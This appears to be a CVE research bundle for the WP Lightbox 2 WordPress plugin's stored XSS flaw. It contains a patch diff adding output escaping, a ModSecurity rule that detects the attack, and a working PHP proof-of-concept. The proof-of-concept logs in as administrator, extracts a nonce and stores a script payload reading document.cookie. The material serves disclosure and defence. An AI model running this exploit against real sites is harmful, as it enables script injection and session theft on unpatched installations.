-		define('ULFBEN_DONATE_URL', 'http://onlinewebapplication.com/');
+
+	if ( ! defined( 'JQLB_SCRIPT' ) ) {
+		define('JQLB_SCRIPT', 'js/dist/wp-lightbox-2.min.js');
 	}

-	define('JQLB_SCRIPT', 'js/dist/wp-lightbox-2.min.js');
-	load_plugin_textdomain('jqlb', false, dirname( plugin_basename( __FILE__ ) ) . '/I18n/');
+	load_plugin_textdomain( 'jqlb', false, dirname( plugin_basename( __FILE__ ) ) . '/I18n/' );
+
 	add_action('admin_init', 'jqlb_register_settings');
-	//add_action('admin_menu', 'jqlb_register_menu_item');
-	add_action('wp_enqueue_scripts', 'jqlb_css');
+	add_action('wp_enqueue_scripts', 'jqlb_css');
 	add_action('wp_enqueue_scripts', 'jqlb_js');
-	//add_filter('plugin_row_meta', 	'jqlb_set_plugin_meta', 2, 10);
+
 	add_filter('the_content', 'jqlb_autoexpand_rel_wlightbox', 99);
-	if(get_option('jqlb_comments') == 1){
+
+	if ( 1 === (int) get_option('jqlb_comments') ) {
 		remove_filter('pre_comment_content', 'wp_rel_nofollow');
 		add_filter('comment_text', 'jqlb_lightbox_comment', 99);
 	}
 }

-function jqlb_set_plugin_meta( $links, $file ) { // Add a link to this plugin's settings page
-	static $this_plugin;
-	if(!$this_plugin) $this_plugin = plugin_basename(__FILE__);
-	if($file == $this_plugin) {
-		$settings_link = '<a href="options-general.php?page=jquery-lightbox-options">'.__('Settings', 'jqlb').'</a>';
-		array_unshift($links, $settings_link);
-	}
-	return $links;
-}
-function jqlb_add_admin_footer(){ //shows some plugin info in the footer of the config screen.
-	$plugin_data = get_plugin_data(__FILE__);
-
-}
-function jqlb_register_settings(){
-	register_setting( 'jqlb-settings-group', 'jqlb_automate', 'jqlb_bool_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_comments', 'jqlb_bool_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_resize_on_demand', 'jqlb_bool_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_show_download', 'jqlb_bool_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_navbarOnTop', 'jqlb_bool_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_margin_size', 'floatval');
-	register_setting( 'jqlb-settings-group', 'jqlb_resize_speed', 'jqlb_pos_intval');
-	register_setting( 'jqlb-settings-group', 'jqlb_help_text');
-
-
-	//register_setting( 'jqlb-settings-group', 'jqlb_follow_scroll', 'jqlb_bool_intval');
-	add_option('jqlb_help_text', '');
-
-	add_option('jqlb_automate', 1); //default is to auto-lightbox.
-	add_option('jqlb_comments', 1);
-	add_option('jqlb_resize_on_demand', 0);
-	add_option('jqlb_show_download', 0);
-	add_option('jqlb_navbarOnTop', 0);
-	add_option('jqlb_resize_speed', 400);
-	//add_option('jqlb_follow_scroll', 0);
+function jqlb_register_settings() {
+	register_setting( 'jqlb-settings-group', 'jqlb_automate',         'jqlb_bool_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_comments',         'jqlb_bool_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_resize_on_demand', 'jqlb_bool_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_show_download',    'jqlb_bool_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_navbarOnTop',      'jqlb_bool_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_resize_speed',     'jqlb_pos_intval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_margin_size',      'floatval' );
+	register_setting( 'jqlb-settings-group', 'jqlb_help_text',        'jplb_help_kses' );
+
+	add_option( 'jqlb_automate', 1 );
+	add_option( 'jqlb_comments', 1 );
+	add_option( 'jqlb_resize_on_demand', 0 );
+	add_option( 'jqlb_show_download', 0 );
+	add_option( 'jqlb_margin_size', 0 );
+	add_option( 'jqlb_navbarOnTop', 0 );
+	add_option( 'jqlb_resize_speed', 400 );
+	add_option( 'jqlb_help_text', '' );
 }
-function jqlb_register_menu_item() {
+function jqlb_register_menu_item() {
 	add_options_page('WP Lightbox Options', 'WP Lightbox 2', 'manage_options', 'jquery-lightbox-options', 'jqlb_options_panel');
 }
-function jqlb_get_locale(){
-	//$lang_locales and ICL_LANGUAGE_CODE are defined in the WPML plugin (http://wpml.org/)
+function jqlb_get_locale() {
+	//$lang_locales and ICL_LANGUAGE_CODE are defined in the WPML plugin (https://wpml.org/)
 	global $lang_locales;
-	if (defined('ICL_LANGUAGE_CODE') && isset($lang_locales[ICL_LANGUAGE_CODE])){
+
+	if (defined('ICL_LANGUAGE_CODE') && isset($lang_locales[ICL_LANGUAGE_CODE])) {
 		$locale = $lang_locales[ICL_LANGUAGE_CODE];
 	} else {
 		$locale = get_locale();
 	}
+
 	return $locale;
 }
-function jqlb_css(){
-	if(is_admin() || is_feed()){return;}
-	$locale = jqlb_get_locale();
-	$fileName = "lightbox.min.{$locale}.css";
-	$path = plugin_dir_path(__FILE__)."styles/{$fileName}";
+function jqlb_css() {
+	if ( is_admin() || is_feed() || wp_doing_ajax() ) {
+		return;
+	}
+
+	$locale   = jqlb_get_locale();
+	$fileName = "lightbox.min.{$locale}.css";
+	$path     = plugin_dir_path(__FILE__) . "styles/{$fileName}";

-	if(!is_readable($path)){
+	if ( ! is_readable( $path ) ) {
 		$fileName = 'lightbox.min.css';
 	}
-	wp_enqueue_style('wp-lightbox-2.min.css', plugin_dir_url(__FILE__).'styles/'.$fileName, false, '1.3.4');
-	// add custom (dinamic) styles for wp lightbox 2
-	?>

-	  <?php
+	wp_enqueue_style('wp-lightbox-2.min.css', plugin_dir_url(__FILE__) . 'styles/' . $fileName, false, '1.3.4');
 }
-function jqlb_js() {
-	if(is_admin() || is_feed()){return;}
-	wp_enqueue_script('jquery', '', array(), '1.7.1', true);
+function jqlb_js() {
+	if ( is_admin() || is_feed() || wp_doing_ajax() ) {
+		return;
+	}
+
+	wp_enqueue_script('jquery', '', array(), '1.7.1', true);
 	wp_enqueue_script('wp-jquery-lightbox', plugins_url(JQLB_SCRIPT, __FILE__ ),  Array('jquery'), '1.3.4.1', true);
+
 	global $wp_lightbox_2;
 	$wp_lightbox_2->parametrs;

-	$parametrs_array=array(
-		'fitToScreen' => get_option('jqlb_resize_on_demand'),
-		'resizeSpeed' => get_option('jqlb_resize_speed'),
-		'displayDownloadLink' => get_option('jqlb_show_download'),
-		'navbarOnTop' => get_option('jqlb_navbarOnTop'),
-		'loopImages' => get_option('jqlb_loopImages'),
-		'resizeCenter' => get_option('jqlb_resizeCenter'),
-		'marginSize' => get_option('jqlb_margin_size'),
-		'linkTarget' => get_option('jqlb_link_target'),
-		'help' => __(get_option('jqlb_help_text'), 'jqlb'),
-		'prevLinkTitle' => $wp_lightbox_2->parametrs->get_design_settings['jqlb_previous_image_title'],
-		'nextLinkTitle' => $wp_lightbox_2->parametrs->get_design_settings['jqlb_next_image_title'],
-		'prevLinkText' =>  __('« Previous', 'jqlb'),
-		'nextLinkText' => __('Next »', 'jqlb'),
-		'closeTitle' => $wp_lightbox_2->parametrs->get_design_settings['jqlb_close_image_title'],
-		'image' => __('Image ', 'jqlb'),
-		'of' => __(' of ', 'jqlb'),
-		'download' => __('Download', 'jqlb')
+	$parametrs_array = array(
+		'fitToScreen'         => (int) get_option('jqlb_resize_on_demand'),
+		'resizeSpeed'         => (int) get_option('jqlb_resize_speed'),
+		'displayDownloadLink' => (int) get_option('jqlb_show_download'),
+		'navbarOnTop'         => (int) get_option('jqlb_navbarOnTop'),
+		'loopImages'          => (int) get_option('jqlb_loopImages'),
+		'resizeCenter'        => (int) get_option('jqlb_resizeCenter'),
+		'marginSize'          => (int) get_option('jqlb_margin_size'),
+		'linkTarget'          => esc_js( get_option('jqlb_link_target') ),
+		'help'                => esc_js( get_option('jqlb_help_text') ),
+		'prevLinkTitle'       => esc_js( $wp_lightbox_2->parametrs->get_design_settings['jqlb_previous_image_title'] ),
+		'nextLinkTitle'       => esc_js( $wp_lightbox_2->parametrs->get_design_settings['jqlb_next_image_title'] ),
+		'closeTitle'          => esc_js( $wp_lightbox_2->parametrs->get_design_settings['jqlb_close_image_title'] ),
+		'prevLinkText'        => __( '« Previous', 'jqlb' ),
+		'nextLinkText'        => __( 'Next »', 'jqlb' ),
+		'image'               => __( 'Image ', 'jqlb' ),
+		'of'                  => __( ' of ', 'jqlb' ),
+		'download'            => __( 'Download', 'jqlb' )
 	);

-	foreach($wp_lightbox_2->parametrs->get_design_settings as $key =>$value){
-		$parametrs_array[$key]	=$value;
+	foreach ( $wp_lightbox_2->parametrs->get_design_settings as $key => $value ) {
+		$parametrs_array[ $key ] = $value;
 	}
-	wp_localize_script('wp-jquery-lightbox', 'JQLBSettings', $parametrs_array);
+
+	wp_localize_script(
+		'wp-jquery-lightbox',
+		'JQLBSettings',
+		$parametrs_array
+	);
 }

-function jqlb_lightbox_comment($comment){
+function jqlb_lightbox_comment( $comment = '' ) {
 	$comment = str_replace('rel='external nofollow'','', $comment);
 	$comment = str_replace('rel='nofollow'','', $comment);
 	$comment = str_replace('rel="external nofollow"','', $comment);
 	$comment = str_replace('rel="nofollow"','', $comment);
+
 	return jqlb_autoexpand_rel_wlightbox($comment);
 }

-function jqlb_autoexpand_rel_wlightbox($content) {
-	if(get_option('jqlb_automate') == 1){
-		global $post;
+function jqlb_autoexpand_rel_wlightbox( $content = '' ) {
+	if ( 1 === (int) get_option('jqlb_automate') ) {
+		global $post;
 		$id = ($post->ID) ? $post->ID : -1;
 		$content = jqlb_do_regexp($content, $id); //legacy regex function when images don't have rel tags
 		$content = wplbtwo_do_regexp($content, $id);
-	}
+	}
 	return $content;
 }
-function jqlb_apply_lightbox($content, $id = -1){
-	if(!isset($id) || $id === -1){
-		$id = time().rand(0, 32768);
+function jqlb_apply_lightbox($content, $id = -1) {
+	if(!isset($id) || $id === -1) {
+		$id = time() . wp_rand( 0, 32768 );
 	}
 	return jqlb_do_regexp($content, $id);
 }

 /* automatically insert rel="lightbox[nameofpost]" to every image with no manual work.
 	if there are already rel="lightbox[something]" attributes, they are not clobbered.
-	Michael Tyson, you are a regular expressions god! - http://atastypixel.com */
-function jqlb_do_regexp($content, $id){
-	$id = esc_attr($id);
+	Michael Tyson, you are a regular expressions god! - https://atastypixel.com */
+function jqlb_do_regexp($content, $id) {
 	$pattern = "/(<a(?![^>]*?rel=['"]lightbox.*)(?![^>]*?rel=.*)[^>]*?href=['"][^'"]+?.(?:bmp|gif|jpg|jpeg|png)?{0,1}S{0,}['"][^>]*)>/i";
-	$replacement = '$1 rel="lightbox['.$id.']">';
+	$replacement = '$1 rel="lightbox[' . esc_attr( $id ) . ']">';
+
 	return preg_replace($pattern, $replacement, $content);
 }

@@ -185,208 +183,210 @@
  *
  * @since 3.0.6.2
  */
-function wplbtwo_do_regexp($content, $id){
-	$id = esc_attr($id);
+function wplbtwo_do_regexp($content, $id) {
 	$pattern = "/(<a(?![^>]*?rel=['"]lightbox.*)[^>]*?href=['"][^'"]+?.(?:bmp|gif|jpg|jpeg|png)?{0,1}S{0,}['"][^>]*)(rel=['"])(.*?)>/i";
-	$replacement = '$1 $2lightbox['.$id.'] $3>';
+	$replacement = '$1 $2lightbox[' . esc_attr( $id ) . '] $3>';
+
 	return preg_replace($pattern, $replacement, $content);
 }

-function jqlb_bool_intval($v){
-	return $v == 1 ? '1' : '0';
+function jqlb_bool_intval( $v = 0 ) {
+	return ( 1 === (int) $v ) ? '1' : '0';
 }

-function jqlb_pos_intval($v){
+function jqlb_pos_intval($v) {
 	return abs(intval($v));
 }
-function jqlb_options_panel(){
-	if(!function_exists('current_user_can') || !current_user_can('manage_options')){
-			die(__('Cheatin’ uh?', 'jqlb'));
-	}
-	add_action('in_admin_footer', 'jqlb_add_admin_footer');
+
+function jplb_help_kses($t) {
+	return wp_kses_post($t);
+}
+
+function jqlb_options_panel() {
+
+	if ( ! function_exists( 'current_user_can' ) || ! current_user_can( 'manage_options' ) ) {
+		die(__('Cheatin’ uh?', 'jqlb'));
+	}
+
 	?>
-
+
 	<div class="wrap">
-	<h2>WP Lightbox 2</h2>
-	<?php include_once(plugin_dir_path(__FILE__).'about.php'); ?>
+	<h2>WP Lightbox 2</h2>
+	<?php include_once plugin_dir_path(__FILE__) . 'about.php'; ?>
 	<form method="post" action="options.php">
 		<table>
-		<?php settings_fields('jqlb-settings-group'); ?>
+			<?php settings_fields('jqlb-settings-group'); ?>
 			<tr valign="baseline" colspan="2">
 				<td colspan="">
-					<?php $check = get_option('jqlb_automate') ? ' checked="yes" ' : ''; ?>
-					<input type="checkbox" id="jqlb_automate" name="jqlb_automate" value="1" <?php echo $check; ?>/>
+					<input type="checkbox" id="jqlb_automate" name="jqlb_automate" value="1" <?php checked( (bool) get_option('jqlb_automate') ); ?> />
 					<label for="jqlb_automate" title="<?php _e('Let the plugin add necessary html to image links', 'jqlb') ?>"> <?php _e('Auto-lightbox image links', 'jqlb') ?></label>
 				</td>
 			</tr>
 			<tr valign="baseline" colspan="2">
 				<td colspan="2">
-					<?php $check = get_option('jqlb_comments') ? ' checked="yes" ' : ''; ?>
-					<input type="checkbox" id="jqlb_comments" name="jqlb_comments" value="1" <?php echo $check; ?>/>
-					<label for="jqlb_comments" title="<?php _e('Note: this will disable the nofollow-attribute of comment links, that otherwise interfere with the lightbox.', 'jqlb') ?>"> <?php _e('Enable lightbox in comments (disables <a href="http://codex.wordpress.org/Nofollow">the nofollow attribute!</a>)', 'jqlb') ?></label>
+					<input type="checkbox" id="jqlb_comments" name="jqlb_comments" value="1" <?php checked( (bool) get_option('jqlb_comments') ); ?> />
+					<label for="jqlb_comments" title="<?php _e('Note: this will disable the nofollow-attribute of comment links, that otherwise interfere with the lightbox.', 'jqlb') ?>"> <?php _e('Enable lightbox in comments (disables <a href="https://codex.wordpress.org/Nofollow">the nofollow attribute!</a>)', 'jqlb') ?></label>
 				</td>
 			</tr>
 			<tr valign="baseline" colspan="2">
 				<td>
-					<?php $check = get_option('jqlb_show_download') ? ' checked="yes" ' : ''; ?>
-					<input type="checkbox" id="jqlb_show_download" name="jqlb_show_download" value="1" <?php echo $check; ?> />
+					<input type="checkbox" id="jqlb_show_download" name="jqlb_show_download" value="1" <?php checked( (bool) get_option('jqlb_show_download') ); ?> />
 					<label for="jqlb_show_download"> <?php _e('Show download link', 'jqlb') ?> </label>
-			</td>
+				</td>
 				<td>
-				<?php $target = get_option('jqlb_link_target'); ?>
-				<label for="jqlb_link_target" title="<?php _e('_blank: open the image in a new window or tab
+					<label for="jqlb_link_target" title="<?php _e('_blank: open the image in a new window or tab
 _self: open the image in the same frame as it was clicked (default)
 _parent: open the image in the parent frameset
-_top: open the image in the full body of the window', 'jqlb') ?>"><?php _e('Target for download link:', 'jqlb'); ?></label>
-				<select id="jqlb_link_target" name="jqlb_link_target">
-					<option <?php if ('_blank' == $target)echo 'selected="selected"'; ?>>_blank</option>
-					<option <?php if ('_self' == $target)echo 'selected="selected"'; ?>>_self</option>
-					<option <?php if ('_top' == $target)echo 'selected="selected"'; ?>>_top</option>
-					<option <?php if ('_parent' == $target)echo 'selected="selected"'; ?>>_parent</option>
-				</select>
+_top: open the image in the full body of the window', 'jqlb') ?>"><?php _e('Target for download link:', 'jqlb'); ?></label>
+					<select id="jqlb_link_target" name="jqlb_link_target">
+						<option <?php selected( get_option('jqlb_link_target'), '_blank'  ); ?>>_blank</option>
+						<option <?php selected( get_option('jqlb_link_target'), '_self'   ); ?>>_self</option>
+						<option <?php selected( get_option('jqlb_link_target'), '_top'    ); ?>>_top</option>
+						<option <?php selected( get_option('jqlb_link_target'), '_parent' ); ?>>_parent</option>
+					</select>
+				</td>
+			</tr>
+			<tr valign="baseline" colspan="2">
+				<td colspan="2">
+					<input type="checkbox" id="jqlb_navbarOnTop" name="jqlb_navbarOnTop" value="1" <?php checked( (bool) get_option('jqlb_navbarOnTop') ); ?> />
+					<label for="jqlb_navbarOnTop">
+						<?php _e('Show image info on top', 'jqlb') ?>
+					</label>
+				</td>
+			</tr>
+			<tr valign="baseline" colspan="2">
+				<td>
+					<input type="checkbox" id="jqlb_resize_on_demand" name="jqlb_resize_on_demand" value="1" <?php checked( (bool) get_option('jqlb_resize_on_demand') ); ?> />
+					<label for="jqlb_resize_on_demand"><?php _e('Shrink large images to fit smaller screens', 'jqlb') ?></label>
+				</td>
+				<?php if ( get_option('jqlb_resize_on_demand') ) : ?>
+				<td>
+					<input type="text" id="jqlb_margin_size" name="jqlb_margin_size" value="<?php echo floatval(get_option('jqlb_margin_size')) ?>" size="3" />
+					<label for="jqlb_margin_size" title="<?php _e('Keep a distance between the image and the screen edges.', 'jqlb') ?>"><?php _e('Minimum margin to screen edge (default: 0)', 'jqlb') ?></label>
+				</td>
+				<?php endif; ?>
+			</tr>
+			<tr valign="baseline" colspan="2">
+				<td colspan="2">
+					<input type="text" id="jqlb_resize_speed" name="jqlb_resize_speed" value="<?php echo intval(get_option('jqlb_resize_speed')) ?>" size="3" />
+					<label for="jqlb_resize_speed"><?php _e('Animation duration (in milliseconds) ', 'jqlb') ?></label>
+				</td>
+			</tr>
+			<tr valign="baseline" colspan="2">
+				<td>
+					<input type="text" id="jqlb_help_text" name="jqlb_help_text" value="<?php echo get_option('jqlb_help_text'); ?>" size="30" />
+					<label for="jqlb_help_text"><?php _e('Help text (default: none) ', 'jqlb'); ?></label>
 				</td>
 			</tr>
-      <tr valign="baseline" colspan="2">
-        <td colspan="2">
-          <?php $check = get_option('jqlb_navbarOnTop') ? ' checked="yes" ' : ''; ?>
-          <input type="checkbox" id="jqlb_navbarOnTop" name="jqlb_navbarOnTop" value="1" <?php echo $check; ?> />
-          <label for="jqlb_navbarOnTop">
-            <?php _e('Show image info on top', 'jqlb') ?>
-          </label>
-        </td>
-      </tr>
-      <tr valign="baseline" colspan="2">
-			<td>
-				<?php $check = get_option('jqlb_resize_on_demand') ? ' checked="yes" ' : ''; ?>
-				<input type="checkbox" id="jqlb_resize_on_demand" name="jqlb_resize_on_demand" value="1" <?php echo $check; ?> />
-				<label for="jqlb_resize_on_demand"><?php _e('Shrink large images to fit smaller screens', 'jqlb') ?></label>
-			</td>
-			<?php IF($check != ''): ?>
-			<td>
-				<input type="text" id="jqlb_margin_size" name="jqlb_margin_size" value="<?php echo floatval(get_option('jqlb_margin_size')) ?>" size="3" />
-				<label for="jqlb_margin_size" title="<?php _e('Keep a distance between the image and the screen edges.', 'jqlb') ?>"><?php _e('Minimum margin to screen edge (default: 0)', 'jqlb') ?></label>
-			</td>
-			<?php ENDIF; ?>
-		</tr>
-		<tr valign="baseline" colspan="2">
-			<td colspan="2">
-				<input type="text" id="jqlb_resize_speed" name="jqlb_resize_speed" value="<?php echo intval(get_option('jqlb_resize_speed')) ?>" size="3" />
-				<label for="jqlb_resize_speed"><?php _e('Animation duration (in milliseconds) ', 'jqlb') ?></label>
-			</td>
-		</tr>
-		<tr valign="baseline" colspan="2">
-			<td>
-				<input type="text" id="jqlb_help_text" name="jqlb_help_text" value="<?php echo get_option('jqlb_help_text'); ?>" size="30" />
-				<label for="jqlb_help_text"><?php _e('Help text (default: none) ', 'jqlb'); ?></label>
-			</td>
-		</tr>
-		 </table>
-		<p style="font-size:xx-small;font-style:italic;"><?php _e('Browse images with your keyboard: Arrows or P(revious)/N(ext) and X/C/ESC for close.', 'jqlb'); ?></p>
-		<p class="submit">
-		  <input type="submit" name="Submit" value="<?php _e('Save Changes', 'jqlb') ?>" />
-		</p>
-	</form>
+			 </table>
+			<p style="font-size:xx-small;font-style:italic;"><?php _e('Browse images with your keyboard: Arrows or P(revious)/N(ext) and X/C/ESC for close.', 'jqlb'); ?></p>
+			<p class="submit">
+			  <input type="submit" name="Submit" value="<?php _e('Save Changes', 'jqlb') ?>" />
+			</p>
+		</form>
 	<?php
 		$locale = jqlb_get_locale();
 		$diskfile = plugin_dir_path(__FILE__)."I18n/howtouse-{$locale}.html";
-		if (!file_exists($diskfile)){
+		if (!file_exists($diskfile)) {
 			$diskfile = plugin_dir_path(__FILE__).'I18n/howtouse.html';
 		}
 		$text = false;
-		if(function_exists('file_get_contents')){
-			$text = @file_get_contents($diskfile);
+		if(function_exists('file_get_contents')) {
+			$text = file_get_contents($diskfile);
 		} else {
-			$text = @file($diskfile);
-			if($text !== false){
+			$text = file($diskfile);
+			if($text !== false) {
 				$text = implode("", $text);
-		      }
+			}
 		}
-		if($text === false){
-			$text = '<p>The documentation files are missing! Try <a href="http://wordpress.org/extend/plugins/wp-lightbox-2/">downloading</a> and <a href="http://wordpress.org/extend/plugins/wp-lightbox-2/installation/">re-installing</a> this lightbox plugin.</p>';
+		if($text === false) {
+			$text = '<p>The documentation files are missing! Try <a href="https://wordpress.org/extend/plugins/wp-lightbox-2/">downloading</a> and <a href="https://wordpress.org/extend/plugins/wp-lightbox-2/installation/">re-installing</a> this lightbox plugin.</p>';
 		}
 		echo $text;
 	?>
-	</div>
+	</div>
 <?php }
+
 function jqlb_hex2rgba($color, $opacity = false) {

 	$default = 'rgb(0,0,0)';
-	if(empty($color))
-          return $default;

-        if ($color[0] == '#' ) {
-        	$color = substr( $color, 1 );
-        }
-
-        if (strlen($color) == 6) {
-                $hex = array( $color[0] . $color[1], $color[2] . $color[3], $color[4] . $color[5] );
-        } elseif ( strlen( $color ) == 3 ) {
-                $hex = array( $color[0] . $color[0], $color[1] . $color[1], $color[2] . $color[2] );
-        } else {
-                return $default;
-        }
-
-        $rgb =  array_map('hexdec', $hex);
-
-        if($opacity){
-        	if(abs($opacity) > 1)
-        		$opacity = 1.0;
-        	$output = 'rgba('.implode(",",$rgb).','.$opacity.')';
-        } else {
-        	$output = 'rgb('.implode(",",$rgb).')';
-        }
-        return $output;
+	if(empty($color)) {
+		return $default;
+	}
+
+	if ($color[0] == '#' ) {
+		$color = substr( $color, 1 );
+	}
+
+	if (strlen($color) == 6) {
+		$hex = array( $color[0] . $color[1], $color[2] . $color[3], $color[4] . $color[5] );
+	} elseif ( strlen( $color ) == 3 ) {
+		$hex = array( $color[0] . $color[0], $color[1] . $color[1], $color[2] . $color[2] );
+	} else {
+		return $default;
+	}
+
+	$rgb =  array_map('hexdec', $hex);
+
+	if($opacity) {
+		if(abs($opacity) > 1) {
+			$opacity = 1.0;
+		}
+		$output = 'rgba('.implode(",",$rgb).','.$opacity.')';
+	} else {
+		$output = 'rgb('.implode(",",$rgb).')';
+	}
+
+	return $output;
 }
 class wp_lightbox_2{
-	// required variables
-
+
 	private $plugin_url;
-
 	private $plugin_path;
-
 	private $version;
-
+
 	public $options;
-
-	public $parametrs;
-
-	function __construct(){
-
+	public $parametrs;
+
+	public function __construct() {
+
 		$this->plugin_url  = trailingslashit( plugins_url('', __FILE__ ) );
 		$this->plugin_path = trailingslashit( plugin_dir_path( __FILE__ ) );
 		$this->version     = 1.0;
-		require_once($this->plugin_path.'includes/install_database.php');
-		$this->parametrs = new wp_lightbox2_database_params();
+
+		require_once $this->plugin_path . 'includes/install_database.php';
+
+		$this->parametrs = new wp_lightbox2_database_params();
+
 		$this->call_base_filters();
-		$this->create_admin_menu();
+		$this->create_admin_menu();
+	}
+	private function create_admin_menu() {

+		require_once $this->plugin_path.'admin/admin_menu.php';
+
+		$admin_menu = new wp_lightbox_admin_menu( array(
+			'plugin_url'         => $this->plugin_url,
+			'plugin_path'        => $this->plugin_path,
+			'databese_parametrs' => $this->parametrs
+		) );
+
+		add_action('admin_menu', array( $admin_menu, 'create_menu' ) );
 	}
-
-	private function create_admin_menu(){
-
-		require_once($this->plugin_path.'admin/admin_menu.php');
-
-		$admin_menu = new wp_lightbox_admin_menu(array('plugin_url' => $this->plugin_url,'plugin_path' => $this->plugin_path,'databese_parametrs' =>$this->parametrs));
-
-		add_action('admin_menu', array($admin_menu,'create_menu'));
-
-	}
-	public function registr_requeried_scripts(){
-		wp_register_script('angularejs',$this->plugin_url.'admin/scripts/angular.min.js');
-		//wp_register_script('youtube_front_end_api_js',$this->plugin_url.'fornt_end/scripts/youtube_plus_front_end.js',array('jquery'));
-		//wp_register_script('youtube_api_js',"https://www.youtube.com/iframe_api",array('youtube_front_end_api_js'));
-		wp_register_style('admin_style_wp_lightbox',$this->plugin_url.'admin/styles/admin_themplate.css');
-		wp_register_style('jquery-ui-style',$this->plugin_url.'admin/styles/jquery-ui.css');
+	public function registr_requeried_scripts() {
+		wp_register_script('angularejs',$this->plugin_url . 'admin/scripts/angular.min.js');
+		wp_register_style('admin_style_wp_lightbox',$this->plugin_url . 'admin/styles/admin_themplate.css');
+		wp_register_style('jquery-ui-style',$this->plugin_url . 'admin/styles/jquery-ui.css');
 	}
-	public function enqueue_requeried_scripts(){
+	public function enqueue_requeried_scripts() {
 		wp_enqueue_style("jquery-ui-style");
 		wp_enqueue_script("jquery-ui-slider");
 	}
-	public function call_base_filters(){
+	public function call_base_filters() {
 		add_action( 'init',  array($this,'registr_requeried_scripts') );
 		add_action( 'admin_head',  array($this,'enqueue_requeried_scripts') );
 	}
-
-
 }
+
 $wp_lightbox_2 = new wp_lightbox_2();

# Atomic Edge WAF Rule - CVE-2026-1430
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:10001430,phase:2,deny,status:403,chain,msg:'CVE-2026-1430: WP Lightbox 2 Stored XSS via AJAX',severity:'CRITICAL',tag:'CVE-2026-1430',tag:'WordPress',tag:'Plugin/WP-Lightbox-2',tag:'attack/xss'"
  SecRule ARGS_GET:action "@streq save_in_databese_lightbox2" "chain"
    SecRule ARGS_POST:jqlb_help_text "@rx [<>'"].*[<>'"]" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,logdata:'Matched %{MATCHED_VAR}'"

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1430 - WP Lightbox 2 < 3.0.7 - Authenticated (Administrator+) Stored Cross-Site Scripting

<?php
/**
 * WP Lightbox 2 Stored XSS Proof of Concept
 * Requires valid administrator credentials and a valid nonce from the settings page.
 */

$target_url = 'https://vulnerable-wordpress-site.com'; // CHANGE THIS
$username = 'admin'; // CHANGE THIS - Administrator username
$password = 'password'; // CHANGE THIS - Administrator password
$payload = '"><script>alert(`Atomic Edge XSS: ${document.cookie}`)</script>'; // XSS payload

// Step 1: Authenticate and get session cookies
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => '/tmp/cookies.txt',
    CURLOPT_COOKIEFILE => '/tmp/cookies.txt',
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_HEADER => true
]);
$response = curl_exec($ch);

// Step 2: Visit the WP Lightbox 2 settings page to obtain a valid nonce
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/admin.php?page=WP-Lightbox-2',
    CURLOPT_POST => false,
    CURLOPT_POSTFIELDS => null,
    CURLOPT_HEADER => false
]);
$settings_page = curl_exec($ch);

// Step 3: Extract the nonce from the page (wp_lightbox_2_general_settings_page)
if (preg_match('/name="wp_lightbox_2_general_settings_page" value="([a-f0-9]+)"/', $settings_page, $matches)) {
    $nonce = $matches[1];
    echo "[+] Found nonce: $noncen";
    
    // Step 4: Send the malicious AJAX request with XSS payload
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php?action=save_in_databese_lightbox2';
    $post_data = [
        'wp_lightbox_2_general_settings_page' => $nonce,
        'jqlb_overlay_opacity' => '80',
        'jqlb_help_text' => $payload, // Vulnerable parameter
        'jqlb_margin_size' => '0',
        'jqlb_automate' => '1',
        'jqlb_comments' => '1',
        'jqlb_resize_on_demand' => '0',
        'jqlb_show_download' => '0',
        'jqlb_navbarOnTop' => '0',
        'jqlb_resize_speed' => '400'
    ];
    
    curl_setopt_array($ch, [
        CURLOPT_URL => $ajax_url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($post_data),
        CURLOPT_RETURNTRANSFER => true
    ]);
    
    $ajax_response = curl_exec($ch);
    
    if (strpos($ajax_response, 'sax_normala') !== false) {
        echo "[+] Payload successfully stored!n";
        echo "[+] Visit $target_url/wp-admin/admin.php?page=WP-Lightbox-2 to trigger the XSS.n";
    } else {
        echo "[-] Failed to store payload. Response: $ajax_responsen";
    }
} else {
    echo "[-] Could not extract nonce from settings pagen";
}

curl_close($ch);
?>